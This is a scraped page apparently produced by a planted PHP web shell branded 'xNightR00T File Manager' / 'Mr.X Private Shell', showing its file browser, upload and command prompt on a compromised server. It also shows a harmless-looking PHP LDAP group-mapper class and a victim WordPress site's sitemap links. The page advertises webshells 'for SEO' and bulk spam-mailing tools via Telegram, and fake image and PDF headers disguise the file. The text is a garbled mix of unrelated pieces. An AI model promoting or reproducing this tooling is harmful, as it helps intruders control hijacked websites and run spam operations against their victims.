xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace Acl\Db;

use Configuration\MapperAbstract;

class MapperGroups extends MapperAbstract
{
    const LINK_TYPE_ROLE        = 1;
    const LINK_TYPE_APPLICATION = 2;

    /**
     * @return array
     */
    public function findAllMappedRoles()
    {
        $resultSet = $this->getTableGateway()->select(array('LINK_TYPE' => self::LINK_TYPE_ROLE));

        $groups = array();
        foreach ($resultSet as $group) {
            $groups[$group['NAME']] = $group['LDAP_GROUP'];
        }

        return $groups;
    }

    /**
     * @return array
     */
    public function findAllMappedApplications()
    {
        $resultSet = $this->getTableGateway()->select(array('LINK_TYPE' => self::LINK_TYPE_APPLICATION));

        $groups = array();
        foreach ($resultSet as $group) {
            $groups[$group['NAME']] = $group['LDAP_GROUP'];
        }

        return $groups;
    }

    /**
     * @param string $role
     * @param string $group
     * @return integer
     */
    public function setRoleMapping($role, $group)
    {
        $result = $this->getTableGateway()->update(array('LDAP_GROUP' => $group), array('NAME' => $role));
        if (0 == $result) {
            $result = $this->getTableGateway()->insert(array('NAME' => $role, 'LDAP_GROUP' => $group, 'LINK_TYPE' => self::LINK_TYPE_ROLE));
        }
        return $result;
    }

    /**
     * @param string $appId
     * @param string $group
     * @return integer
     */
    public function setApplicationMapping($appId, $group)
    {
        $result = $this->getTableGateway()->update(array('LDAP_GROUP' => $group), array('NAME' => $appId));
        if (0 == $result) {
            $result = $this->getTableGateway()->insert(array('NAME' => $appId, 'LDAP_GROUP' => $group, 'LINK_TYPE' => self::LINK_TYPE_APPLICATION));
        }
        return $result;
    }

    /**
     * @param string $name
     * @return number
     */
    public function deleteMapping($name)
    {
        return $this->getTableGateway()->delete(array('NAME' => $name));
    }
}

Filemanager

Name Type Size Permission Actions
Mapper.php File 3.29 KB 0644
MapperGroups.php File 2 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml